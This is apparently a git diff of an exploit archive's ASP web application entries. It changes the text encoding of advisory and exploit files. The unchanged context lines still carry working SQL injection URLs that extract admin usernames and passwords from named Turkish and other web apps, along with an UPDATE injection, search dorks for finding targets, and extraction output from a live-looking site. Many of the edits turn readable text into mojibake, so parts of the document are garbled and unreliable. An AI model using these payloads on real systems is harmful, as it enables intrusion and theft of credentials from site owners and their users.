Ramazan Bayrami MUBAREK Olsun , Bir Daha Nasib Olur Ýnsallah ## '[Note : exploit file name =>exploit1.asp '[Using : Write Target and ID after Submit Click diff --git a/platforms/asp/webapps/2762.asp b/platforms/asp/webapps/2762.asp index cd05b9e91..af02489cc 100755 --- a/platforms/asp/webapps/2762.asp +++ b/platforms/asp/webapps/2762.asp @@ -13,9 +13,9 @@ '[Note : exploit file name =>exploit1.asp '[Using : Write Target and ID after Submit Click -'[Using : Tr:Alnan Sifreyi Perl scriptinde czn. +'[Using : Tr:Alýnan Sifreyi Perl scriptinde cözün. '[Using : Tr:Scriptin Tr Dilinde bu exploitle bilgileri alamassiniz,manuel cekebilirsiniz -'[Using : Tr:Kimsenin boyle yapicak kadar seviyesiz oldunu dsnmyorum. +'[Using : Tr:Kimsenin boyle yapicak kadar seviyesiz oldunu düsünmüyorum. '=============================================================================================== 'use sub decrypt() from http://www.milw0rm.com/exploits/1597 to decrypt /str0ke diff --git a/platforms/asp/webapps/2781.txt b/platforms/asp/webapps/2781.txt index 3ca0ea814..90c8bed38 100755 --- a/platforms/asp/webapps/2781.txt +++ b/platforms/asp/webapps/2781.txt @@ -17,7 +17,7 @@ vulnerables fields: - Comments -laurent gaffi & benjamin moss +laurent gaffié & benjamin mossé http://s-a-p.ca/ contact: saps.audit@gmail.com diff --git a/platforms/asp/webapps/2782.txt b/platforms/asp/webapps/2782.txt index f4d2e30f2..37eeafb37 100755 --- a/platforms/asp/webapps/2782.txt +++ b/platforms/asp/webapps/2782.txt @@ -15,7 +15,7 @@ variables: Hpecs_Find=maingroup&searchstring='[sql] ( or just post your query in the search engine ... ) -laurent gaffi & benjamin moss +laurent gaffié & benjamin mossé http://s-a-p.ca/ contact: saps.audit@gmail.com diff --git a/platforms/asp/webapps/29216.html b/platforms/asp/webapps/29216.html index 869e01236..26a6ed050 100755 --- a/platforms/asp/webapps/29216.html +++ b/platforms/asp/webapps/29216.html @@ -1,6 +1,6 @@ source: http://www.securityfocus.com/bid/21398/info -Aspee Ziyaretçi Defteri is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. +Aspee Ziyaretçi Defteri is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation. diff --git a/platforms/asp/webapps/29240.txt b/platforms/asp/webapps/29240.txt index 1b733b30e..b9023384b 100755 --- a/platforms/asp/webapps/29240.txt +++ b/platforms/asp/webapps/29240.txt @@ -1,6 +1,6 @@ source: http://www.securityfocus.com/bid/21511/info -?ilem Haber Free Edition is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. +Ã?ilem Haber Free Edition is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user. This may help the attacker steal cookie-based authentication credentials and launch other attacks. diff --git a/platforms/asp/webapps/2962.txt b/platforms/asp/webapps/2962.txt index b66d60092..d2f522c7a 100755 --- a/platforms/asp/webapps/2962.txt +++ b/platforms/asp/webapps/2962.txt @@ -8,7 +8,7 @@ # Found By : ShaFuck31 -# Thanks : | Dekolax | The RD | DesquneR | f1r3b0y | BaZaL | SaboTaqe | ST@ReXT | BLaSTER | UNiKnoX | +# Thanks : | Dekolax | The RéD | DesquneR | f1r3b0y | BaZaL | SaboTaqe | ST@ReXT | BLaSTER | UNiKnoX | # Vulnerable file : down.asp diff --git a/platforms/asp/webapps/29675.txt b/platforms/asp/webapps/29675.txt index 87e9c0817..e836738fe 100755 --- a/platforms/asp/webapps/29675.txt +++ b/platforms/asp/webapps/29675.txt @@ -24,12 +24,12 @@ PDF: http://security-assessment.com/files/documents/advisory/Kaseya%20File%20Upl +-----------+ Kaseya 6.3 suffers from an Arbitrary File Upload vulnerability that can be leveraged to gain remote code -execution on the Kaseya server. The code executed in this way will run with a local IUSR accounts privileges. +execution on the Kaseya server. The code executed in this way will run with a local IUSR account’s privileges. The vulnerability lies within the /SystemTab/UploadImage.asp file. This file constructs a file object on disk using user input, without first checking if the user is authenticated or if input is valid. The application preserves the file name and extension of the upload, and allows an attacker to traverse from the default destination directory. Directory traversal is not necessary to gain code execution however, as the default path lies within the -applications web-root. +application’s web-root. +------------+ diff --git a/platforms/asp/webapps/30141.txt b/platforms/asp/webapps/30141.txt index 9508b9421..c95211919 100755 --- a/platforms/asp/webapps/30141.txt +++ b/platforms/asp/webapps/30141.txt @@ -1,9 +1,9 @@ source: http://www.securityfocus.com/bid/24288/info -Hünkaray Okul Portalý is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. +Hünkaray Okul Portalý is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this issue by manipulating the SQL query logic to carry out unauthorized actions on the underlying database. -Hünkaray Okul Portalý 1.1 is vulnerable to this issue. +Hünkaray Okul Portalý 1.1 is vulnerable to this issue. http://www.example.com/okul/haberoku.asp?id=11%20union+select+0,sifre,kullaniciadi,3,4+from+admin \ No newline at end of file diff --git a/platforms/asp/webapps/30165.txt b/platforms/asp/webapps/30165.txt index 0dd5bc4bc..430c3928a 100755 --- a/platforms/asp/webapps/30165.txt +++ b/platforms/asp/webapps/30165.txt @@ -1,9 +1,9 @@ source: http://www.securityfocus.com/bid/24379/info -Ibrahim ?AKICI Okul Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. +Ibrahim Ã?AKICI Okul Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this issue by manipulating the SQL query logic to carry out unauthorized actions on the underlying database. -Ibrahim ?AKICI Okul Portal 2.0 is vulnerable to this issue. +Ibrahim Ã?AKICI Okul Portal 2.0 is vulnerable to this issue. http://www.example.com/haber_oku.asp?id=9%20union+select+0,sifre,kulladi,3,4,5,6+from+uyeler \ No newline at end of file diff --git a/platforms/asp/webapps/30327.html b/platforms/asp/webapps/30327.html index 1ea2af3f3..849b94eca 100755 --- a/platforms/asp/webapps/30327.html +++ b/platforms/asp/webapps/30327.html @@ -10,13 +10,13 @@ Dora Emlak Script v1.0 is vulnerable. You write xss code in page's text box -Ad -Soyad +Adý +Soyadý Mail Adresiniz Konu -Mesaj +Mesajý -Press to "gr"(send) button. +Press to "gör"(send) button. http://www.example.com//dora/default.asp?goster=emlakdetay&id= [SQL] \ No newline at end of file diff --git a/platforms/asp/webapps/30331.html b/platforms/asp/webapps/30331.html index 1caaaab18..2d25030a0 100755 --- a/platforms/asp/webapps/30331.html +++ b/platforms/asp/webapps/30331.html @@ -10,9 +10,9 @@ Asp cvmatik 1.1 is vulnerable. You write xss code in page's text box -Ad +Adý or -Soyad +Soyadý or Ehliyet or diff --git a/platforms/asp/webapps/3073.txt b/platforms/asp/webapps/3073.txt index 35331bb7a..132c3601e 100755 --- a/platforms/asp/webapps/3073.txt +++ b/platforms/asp/webapps/3073.txt @@ -3,7 +3,7 @@ # Author : ajann # Contact : :( # S.Page : http://www.locazo.net:81 -# Dork : "Powered by Locazolist Copyright 2006" +# Dork : "Powered by Locazolist Copyright © 2006" # $$ : $100 ************************************************************************************* diff --git a/platforms/asp/webapps/3197.txt b/platforms/asp/webapps/3197.txt index a0f3694d0..246e7c18f 100755 --- a/platforms/asp/webapps/3197.txt +++ b/platforms/asp/webapps/3197.txt @@ -31,8 +31,8 @@ Example: diff --git a/platforms/asp/webapps/32151.pl b/platforms/asp/webapps/32151.pl index 63a0bd0bd..c5f211eef 100755 --- a/platforms/asp/webapps/32151.pl +++ b/platforms/asp/webapps/32151.pl @@ -8,7 +8,7 @@ Exploiting this issue could allow an attacker to compromise the application, acc #Coded By U238 #Discovered By U238 #mail : setuid.noexec0x1]at]hotmail.com -#From : Trkiye / Erzincan +#From : Türkiye / Erzincan #Thnx : The_BekiR - ZeberuS - Fahn - ka0x - Deep Power - Marco Almeida #Gretz: http://bilisimMimarileri.com : http://bilgiguvenligi.gov.tr diff --git a/platforms/asp/webapps/32212.txt b/platforms/asp/webapps/32212.txt index dae4f250b..4938763a4 100755 --- a/platforms/asp/webapps/32212.txt +++ b/platforms/asp/webapps/32212.txt @@ -12,7 +12,7 @@ The following URL and parameters have been confirmed to suffer from Blind SQL in http[s]:///Resources/System/Templates/Data.aspx?DocID=1&field=JobID&value=1&JobID=1&ParentDocID=1694&InTab=1&ParentKey=JobNumber&NoStore=1&Popup=1 -This vulnerability exists because value variable is not sanitised before it is used as part of an SQL query to retrived specific job information. +This vulnerability exists because ‘value’ variable is not sanitised before it is used as part of an SQL query to retrived specific job information. Impact: An attacker would be able to exfiltrate the database, user credentials and in certain setup access the underling operating system. @@ -26,7 +26,7 @@ Vendor status: 07/03/2014 Published Copyright: -Copyright Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited. +Copyright © Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited. Disclaimer: -The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the users risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information. +The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user’s risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information. diff --git a/platforms/asp/webapps/3241.txt b/platforms/asp/webapps/3241.txt index 904676b38..d2630a656 100755 --- a/platforms/asp/webapps/3241.txt +++ b/platforms/asp/webapps/3241.txt @@ -4,7 +4,7 @@ #Site : www.hacklive.org , www.illegal-attack.org #Contact: admin@hacklive.org ############################################################### -#Download Hnkaray Duyuru Scripti (tr) : http://www.aspindir.com/Goster/4678 +#Download Hünkaray Duyuru Scripti (tr) : http://www.aspindir.com/Goster/4678 #Demo : http://b.1asphost.com/hunkaray/duyuru #Exploit; diff --git a/platforms/asp/webapps/3295.txt b/platforms/asp/webapps/3295.txt index bf3ef7b00..0681c6f82 100755 --- a/platforms/asp/webapps/3295.txt +++ b/platforms/asp/webapps/3295.txt @@ -30,7 +30,7 @@ Forum: username + password ---------------------------------------------------- -Download: open http://www.aspindir.com/indir.asp?id=3538 and click "Ýndirmek için týklayýn" . +Download: open http://www.aspindir.com/indir.asp?id=3538 and click "Ýndirmek için týklayýn" . ---------------------------------------------------- diff --git a/platforms/asp/webapps/3301.txt b/platforms/asp/webapps/3301.txt index 77abcb98b..3d9184652 100755 --- a/platforms/asp/webapps/3301.txt +++ b/platforms/asp/webapps/3301.txt @@ -10,7 +10,7 @@ XxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxXxX # Script : PollMentor v2.0 # Download : http://www.aspindir.com/indir.asp?id=4406 # Demo : http://www.aspcode.net/products/pollmentor/demo/pollmentor.asp -# ug in : pollmentorres.asp +# ßug in : pollmentorres.asp # Exp. : http://[site]/[script-path]/pollmentorres.asp?id=-1+UPDATE+poll+SET+question='HekId';-- diff --git a/platforms/asp/webapps/3318.txt b/platforms/asp/webapps/3318.txt index ea96c46ea..89ce2baa1 100755 --- a/platforms/asp/webapps/3318.txt +++ b/platforms/asp/webapps/3318.txt @@ -16,7 +16,7 @@ Exploit: HaberDetay.asp ----------------------------------------------------------------------- -Ayklama: username +Açyklama: username Eklenme tarihi: password ----------------------------------------------------------------------- diff --git a/platforms/asp/webapps/33700.txt b/platforms/asp/webapps/33700.txt index d237152a8..9a9db24b5 100755 --- a/platforms/asp/webapps/33700.txt +++ b/platforms/asp/webapps/33700.txt @@ -134,4 +134,4 @@ security advisories. More information about RedTeam Pentesting can be found at https://www.redteam-pentesting.de. --- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschftsfhrer: Patrick Hof, Jens Liebchen \ No newline at end of file +-- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen \ No newline at end of file diff --git a/platforms/asp/webapps/34864.txt b/platforms/asp/webapps/34864.txt index 39367268f..cc5c3ea5e 100755 --- a/platforms/asp/webapps/34864.txt +++ b/platforms/asp/webapps/34864.txt @@ -15,8 +15,8 @@ in the database connection and email settings page, it is possible to access their content by observing the HTML code. Affected password values: - - Database Connection - - E-mail Connection + - “Database Connection” + - “E-mail Connection” Associated CAPEC: CAPEC-167: Lifting Sensitive Data from the Client - @@ -37,10 +37,10 @@ of the application. Example of affected functionalities for persistent XSS: - 1. While viewing Order details, and injecting a malicious payload on the "Notes" section. - - 2. While modifying an Order to consume and injecting a malicious payload + - 2. While modifying an “Order to consume” and injecting a malicious payload on the "Description" section. - - 3. While observing the Favorites section and and injecting a malicious -payload on the Favorites name section. + - 3. While observing the “Favorites” section and and injecting a malicious +payload on the “Favorites name” section. Example of an injected payload: Example of affected URLs for reflective XSS: diff --git a/platforms/asp/webapps/3493.txt b/platforms/asp/webapps/3493.txt index 8dd62b9ec..fcd594c6d 100755 --- a/platforms/asp/webapps/3493.txt +++ b/platforms/asp/webapps/3493.txt @@ -194,16 +194,16 @@ MSSQL CMD Injection Exploit(For DBO Users) :

Command Exec : - +   Search Board - +  

+  

diff --git a/platforms/asp/webapps/4486.txt b/platforms/asp/webapps/4486.txt index 1636cb4dc..4e46d0187 100755 --- a/platforms/asp/webapps/4486.txt +++ b/platforms/asp/webapps/4486.txt @@ -1,4 +1,4 @@ -#Title : Furkan Taştan Blog Remote SQL Injection Vulnerability +#Title : Furkan TaÅŸtan Blog Remote SQL Injection Vulnerability #Author : CyberGhost #Demo Page : http://furkantastan.somee.com/blog #Script Download Page: : http://www.aspindir.com/indir.asp?ID=5152 @@ -12,7 +12,7 @@ ==================================== -Saz Arkadaşlarım: Hackinger - KinSize - dumenci - Kerem125 - Gsy - F10 +Saz ArkadaÅŸlarım: Hackinger - KinSize - dumenci - Kerem125 - Gsy - F10 And All TURKISH HACKERS ! diff --git a/platforms/asp/webapps/4900.txt b/platforms/asp/webapps/4900.txt index ed765eb65..1fe6c2834 100755 --- a/platforms/asp/webapps/4900.txt +++ b/platforms/asp/webapps/4900.txt @@ -8,7 +8,7 @@ # Google Dork : "download this free gallery at matteobinda.com" # : allinurl: imgbig.asp?id= # -# Found By : Ruben Ventura Piña (Trew) +# Found By : Ruben Ventura Piña (Trew) # Contact Info : http://trew.icenetx.net # trew.revolution@gmail.com # ICEnetX Team - http://icenetx.net diff --git a/platforms/asp/webapps/4910.pl b/platforms/asp/webapps/4910.pl index 9a605dc60..eb938a8f3 100755 --- a/platforms/asp/webapps/4910.pl +++ b/platforms/asp/webapps/4910.pl @@ -96,7 +96,7 @@ print "\n"; if ( $host !~ /^http:/ ) { - # lo añadimos + # lo añadimos $host = 'http://' . $host; } diff --git a/platforms/asp/webapps/5185.txt b/platforms/asp/webapps/5185.txt index cc276f9c8..6ad35f099 100755 --- a/platforms/asp/webapps/5185.txt +++ b/platforms/asp/webapps/5185.txt @@ -39,7 +39,7 @@ # question.asp?QID=-1122334455%20+%20union%20+%20select%20+%200,null,2,username,password,5,password,7,8,9,null%20+%20from%20+%20+%20administrator%20';'; ######################################################################### -# some týmes thýs sql +# some týmes thýs sql # example 2 : columns number 11 # question.asp?QID=-1%20+%20union%20+%20select%20+%200,1,2,username,4,5,password,7,8,9,10,11%20+%20from%20+%20+%20administrator%20';'; diff --git a/platforms/asp/webapps/5187.txt b/platforms/asp/webapps/5187.txt index 6ba3f37fe..8bf8ac2a3 100755 --- a/platforms/asp/webapps/5187.txt +++ b/platforms/asp/webapps/5187.txt @@ -8,7 +8,7 @@ # # HOME : http://www.milw0rm.com/author/1334 # -# MAİL : hackturkiye.hackturkiye@gmail.com +# MAÄ°L : hackturkiye.hackturkiye@gmail.com # ################################################################ # diff --git a/platforms/asp/webapps/5276.txt b/platforms/asp/webapps/5276.txt index c3f5c2eb9..4ec7e7418 100755 --- a/platforms/asp/webapps/5276.txt +++ b/platforms/asp/webapps/5276.txt @@ -18,12 +18,12 @@ Iatek | ASPapp -links.asp (CatId) SQL Injection Vulnerability ------------------------------------------------------------- ----------------example-------------------------------------- -Links › guest › 12 › 1 user -Links › editor › editor › 2 materator -Links › manager› manager› 2 materator -Links › surco › surco › 2 materator -Links › admin › admin › 3 admin -Links › ovivas › ovivas › 4 super-admin----- we ll login with this username +Links › guest › 12 › 1 user +Links › editor › editor › 2 materator +Links › manager› manager› 2 materator +Links › surco › surco › 2 materator +Links › admin › admin › 3 admin +Links › ovivas › ovivas › 4 super-admin----- we ll login with this username ------------------------------------------------------------- ------------------------------------------------------------- diff --git a/platforms/asp/webapps/5373.txt b/platforms/asp/webapps/5373.txt index cca61d3b0..2230585ea 100755 --- a/platforms/asp/webapps/5373.txt +++ b/platforms/asp/webapps/5373.txt @@ -1,6 +1,6 @@ _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- -CoBaLT v1.0 Remote SQL İnjection Vulnerabiltiy +CoBaLT v1.0 Remote SQL Ä°njection Vulnerabiltiy Discovered : U238 @@ -36,7 +36,7 @@ Admin Panel : localhost/path/admin Other Table : bayi - sepet - siparis - siparis_urun - urun - urun_grup - yonetici -Dork : Sevmem bole seylerı , abi anlamıorum ne bos adamlarsınız :( +Dork : Sevmem bole seylerı , abi anlamıorum ne bos adamlarsınız :( Error Code: @@ -48,7 +48,7 @@ Error Code: Example Site : http://xxx.org/cobaltv1/urun.asp?id=24+union+select+0,1,sifre,3,kadi+from+yonetici -_-_-_-_-_- NURCİHAN _-_-_-_-_- BU SEVDA BİTMEZ _-_-_-_-_- 4 YIL OLDU Amk +_-_-_-_-_- NURCÄ°HAN _-_-_-_-_- BU SEVDA BÄ°TMEZ _-_-_-_-_- 4 YIL OLDU Amk Greatz To : The_BekiR _-_ ka0x _-_ Nettoxic _-_ ZeberuS _-_ Str0ke diff --git a/platforms/asp/webapps/5409.txt b/platforms/asp/webapps/5409.txt index af1571d89..4d8d4a57b 100755 --- a/platforms/asp/webapps/5409.txt +++ b/platforms/asp/webapps/5409.txt @@ -1,6 +1,6 @@ -_-_--_-_--_-_--_-_--_-_--_-_--_-_--_-_--_-_--_-_--_-_--_-_ -SuperNET Shop v1.0 Remote SQL Ä°njection Vulnerability +SuperNET Shop v1.0 Remote SQL Ä°njection Vulnerability Discovered By : U238 (ugur238) @@ -69,7 +69,7 @@ Ye34h lets see you now admin panell ; ) */ Greatz : The_BekiR - ZeberuS - ka0x - nettoxic - fahn - str0ke -MUSTAFA KEMAL ATATURK - ATAM Ä°ZÄ°NDEYIZ +MUSTAFA KEMAL ATATURK - ATAM Ä°ZÄ°NDEYIZ /* diff --git a/platforms/asp/webapps/5475.txt b/platforms/asp/webapps/5475.txt index e78a6f20d..c92290ff1 100755 --- a/platforms/asp/webapps/5475.txt +++ b/platforms/asp/webapps/5475.txt @@ -1,4 +1,4 @@ -Philboard W1L3D4 v1.0 Multiple SQL İnjection Vulnerable +Philboard W1L3D4 v1.0 Multiple SQL Ä°njection Vulnerable Author : U238 @@ -69,7 +69,7 @@ sql = "SELECT replies.*, forums.*, topics.locked FROM (forums INNER JOIN topics id = Request.QueryString("id") IF Not IsNumeric(request.querystring("id")) THEN -Response.write "sql injection mu arıyon yawrucum,anam? !!" +Response.write "sql injection mu arıyon yawrucum,anam? !!" Response.End END IF diff --git a/platforms/asp/webapps/5503.txt b/platforms/asp/webapps/5503.txt index 2bb477dd5..d63cca5e7 100755 --- a/platforms/asp/webapps/5503.txt +++ b/platforms/asp/webapps/5503.txt @@ -17,7 +17,7 @@ Script2 : http://rapidshare.de/files/39240819/angelo-emlak_v1.0.zip.html -not : Siz0yyffyeniz biz kardesim inkar edenmı var ya :( - Allah .belanı versin ulan $iz0 .buda yılın sozu :D +not : Siz0yyffyeniz biz kardesim inkar edenmı var ya :( - Allah .belanı versin ulan $iz0 .buda yılın sozu :D _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_ diff --git a/platforms/asp/webapps/5564.txt b/platforms/asp/webapps/5564.txt index 814d9e10a..290cb1dc9 100755 --- a/platforms/asp/webapps/5564.txt +++ b/platforms/asp/webapps/5564.txt @@ -1,4 +1,4 @@ -Shader TV (Beta) Multiple Remote SQL İnjection Vulnerable +Shader TV (Beta) Multiple Remote SQL Ä°njection Vulnerable Script : http://www.aspindir.com/indir.asp?ID=5441 @@ -22,9 +22,9 @@ http://noexec.blogspot.com -0x1 = [S** Says : Allah Belanı Versin Ulan Şiz0 !] +0x1 = [S** Says : Allah Belanı Versin Ulan Åžiz0 !] -0x2 = [Ben Sadece İyi Bir İnsan Olmak İstemistim ] +0x2 = [Ben Sadece Ä°yi Bir Ä°nsan Olmak Ä°stemistim ] Exploit: diff --git a/platforms/asp/webapps/5608.txt b/platforms/asp/webapps/5608.txt index 694b4a3c1..2b735a67a 100755 --- a/platforms/asp/webapps/5608.txt +++ b/platforms/asp/webapps/5608.txt @@ -1,6 +1,6 @@ -\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\ -Meto Forum v1.1 Multiple Remote SQL İinjectin Vulnerable +Meto Forum v1.1 Multiple Remote SQL Ä°injectin Vulnerable Script : http://www.aspindir.com/goster/5444 @@ -11,14 +11,14 @@ Coded : Asp , SQL Language = 'Acces' -\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\--\- -\-/ -EİP [1] Exploit: +EÄ°P [1] Exploit: http://localhost:2222/lab/MetoForumV1/forum/kategori.asp?kid=20+union+select+0,kullanici,2,3,4,parola,6+from+uyeler&y=SnnX%20Mesaj%20Panosu%20Test Log in Admin Panel > cookie Saved , -This Script file have SQL İnjectin atack. +This Script file have SQL Ä°njectin atack. http://localhost:2222/lab/MetoForumV1/forum/admin_kategori.asp?kid=1+union+select+0,1,parola,3,4,kullanici,6+from+uyeler+where+id=1 2,3,4,5,6 @@ -53,6 +53,6 @@ pgp key --> http://ugurcan.by.ru/U238.asc Friends --> < Teyfik Cevik - ka0x - The_BekiR - Erhan Bulut - Caborz - Nettoxic - fahn - ZeberuS > -Dunyanın En buyuk Ve En Zeki Lideri Olan Mustafa Kemal Ataturk'u Selamlarım. +Dunyanın En buyuk Ve En Zeki Lideri Olan Mustafa Kemal Ataturk'u Selamlarım. # milw0rm.com [2008-05-13] diff --git a/platforms/asp/webapps/5753.txt b/platforms/asp/webapps/5753.txt index cc5103a41..7bdaf9ba9 100755 --- a/platforms/asp/webapps/5753.txt +++ b/platforms/asp/webapps/5753.txt @@ -1,4 +1,4 @@ -[+] Script Name : JiRo´s FAQ Manager eXperience +[+] Script Name : JiRo´s FAQ Manager eXperience [+] Version : v 1.0 [+] Price : _ Single Website License 34.95 $ _ 2 Websites License 62.95 $ diff --git a/platforms/asp/webapps/6135.txt b/platforms/asp/webapps/6135.txt index 2b13be0d7..4a740b7bb 100755 --- a/platforms/asp/webapps/6135.txt +++ b/platforms/asp/webapps/6135.txt @@ -10,9 +10,9 @@ Download:http://login.fipsasp.com/File.asp?ID=60&CatID=5 Found By U238 # Exploit Search Find: ^o) # -# fipsCMS light - © fipsASP 2003 - 2008. All rights reserved +# fipsCMS light - © fipsASP 2003 - 2008. All rights reserved # -# fipsCMS light - © fipsASP 2003 - 2008 +# fipsCMS light - © fipsASP 2003 - 2008 # # inurl:"fipsASP 2003 - 2008" # ************************************************ diff --git a/platforms/asp/webapps/6470.txt b/platforms/asp/webapps/6470.txt index a2d0e346b..40f900a98 100755 --- a/platforms/asp/webapps/6470.txt +++ b/platforms/asp/webapps/6470.txt @@ -44,7 +44,7 @@ MSysAccessStorage%20t1,%20MSysAccessStorage%20t2,%20MSysAccessStorage%20t3,%20MS => `result.txt' Resolviendo www.hotelsk.net... 67.15.59.114 Connecting to www.hotelsk.net|67.15.59.114|:80... conectado. -Petición HTTP enviada, esperando respuesta... 200 OK +Petición HTTP enviada, esperando respuesta... 200 OK Longitud: 4,465 (4.4K) [text/html] 100%[====================================>] 4,465 18.53K/s diff --git a/platforms/asp/webapps/6720.txt b/platforms/asp/webapps/6720.txt index 195f454b1..7246b316b 100755 --- a/platforms/asp/webapps/6720.txt +++ b/platforms/asp/webapps/6720.txt @@ -10,14 +10,14 @@ Script : Ayco Okul Portali (tr) Sql injection Vulnerability http://www.aspindir.com/goster/5640 -Price : 100 € +Price : 100 € ************************************************************************************** Exploit : default.asp?tip=sollinkicerik&linkid=1+union+select+0,password,username,3+from+admin ************************************************************************************** -N0te : Zeh1r Oluyor G€c€l€r 1nan Uyuyam1yorum ! +N0te : Zeh1r Oluyor G€c€l€r 1nan Uyuyam1yorum ! ************************************************************************************** # milw0rm.com [2008-10-10] diff --git a/platforms/asp/webapps/6725.txt b/platforms/asp/webapps/6725.txt index bf48cf5f8..14f854442 100755 --- a/platforms/asp/webapps/6725.txt +++ b/platforms/asp/webapps/6725.txt @@ -17,6 +17,6 @@ union+select+all+0,U_ADI,2,U_SIFRE,4,5,6,7,8,9,10,11,12,13+from+uyeler Greetz : ENO7 - Liz0zim - Kerem125 - Prens - SaO - The_BekiR - h4ckinger - ZeberuS --------------------------------------- -Note: Önemli Olan İnsan Olmaktır. +Note: Önemli Olan Ä°nsan Olmaktır. # milw0rm.com [2008-10-10] diff --git a/platforms/asp/webapps/7273.txt b/platforms/asp/webapps/7273.txt index e3f82244d..9d00b3605 100755 --- a/platforms/asp/webapps/7273.txt +++ b/platforms/asp/webapps/7273.txt @@ -1,11 +1,11 @@ -[~] ----------------------------بسم الله الرحمن الرحيم------------------------------ +[~] ----------------------------بسم الله الرحمن الرحيم------------------------------ [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability [~]Vendor:www.activewebsoftwares.com [~]Software: Active Force Matrix v 2 - [~]author: ((я3d D3v!L)) + [~]author: ((я3d D3v!L)) [~] Date: 28.11.2008 @@ -30,9 +30,9 @@ [~]-------------------------------------------------------------------------------- - [~] Greetz tO: {str0ke} &keta &m4n0n & maxmos & EV!L KS@ & hesham_hacker &الزهيري + [~] Greetz tO: {str0ke} &keta &m4n0n & maxmos & EV!L KS@ & hesham_hacker &الزهيري [~] - [~] spechial thanks : dolly & 7am3m & عماد & {str0ke} + [~] spechial thanks : dolly & 7am3m & عماد & {str0ke} [~] [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller [~] diff --git a/platforms/asp/webapps/7274.txt b/platforms/asp/webapps/7274.txt index aabb144c0..188692826 100755 --- a/platforms/asp/webapps/7274.txt +++ b/platforms/asp/webapps/7274.txt @@ -1,11 +1,11 @@ -[~] ----------------------------بسم الله الرحمن الرحيم------------------------------ +[~] ----------------------------بسم الله الرحمن الرحيم------------------------------ [~]Tybe:(Merchantsadd.asp AccountID) Blind SQL Injection Vulnerability [~]Vendor:www.activewebsoftwares.com [~]Software: ASPReferral - [~]author: ((я3d D3v!L)) + [~]author: ((я3d D3v!L)) [~] Date: 28.11.2008 @@ -28,9 +28,9 @@ [~]-------------------------------------------------------------------------------- - [~] Greetz tO: {str0ke} &keta &m4n0n & maxmos & EV!L KS@ & hesham_hacker &الزهيري + [~] Greetz tO: {str0ke} &keta &m4n0n & maxmos & EV!L KS@ & hesham_hacker &الزهيري [~] - [~] spechial thanks : dolly & 7am3m & عماد & {str0ke} + [~] spechial thanks : dolly & 7am3m & عماد & {str0ke} [~] [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller [~] diff --git a/platforms/asp/webapps/7275.txt b/platforms/asp/webapps/7275.txt index 269edd102..84e5a97ec 100755 --- a/platforms/asp/webapps/7275.txt +++ b/platforms/asp/webapps/7275.txt @@ -1,11 +1,11 @@ -[~] ----------------------------بسم الله الرحمن الرحيم------------------------------ +[~] ----------------------------بسم الله الرحمن الرحيم------------------------------ [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability [~]Vendor: www.activewebsoftwares.com [~]Software: ActiveVotes v 2.2 - [~]author: ((я3d D3v!L)) + [~]author: ((я3d D3v!L)) [~] Date: 28.11.2008 @@ -30,7 +30,7 @@ [~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker [~] - [~] spechial thanks : dolly & 7am3m & عماد ,الزهيري + [~] spechial thanks : dolly & 7am3m & عماد ,الزهيري [~] [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller [~] diff --git a/platforms/asp/webapps/7276.txt b/platforms/asp/webapps/7276.txt index a40df7a0b..71fe38b0d 100755 --- a/platforms/asp/webapps/7276.txt +++ b/platforms/asp/webapps/7276.txt @@ -1,11 +1,11 @@ -[~] ----------------------------بسم الله الرحمن الرحيم------------------------------ +[~] ----------------------------بسم الله الرحمن الرحيم------------------------------ [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability [~]Vendor: www.activewebsoftwares.com [~]Software: Active Test v 2.1 - [~]author: ((я3d D3v!L)) + [~]author: ((я3d D3v!L)) [~] Date: 28.11.2008 @@ -30,7 +30,7 @@ 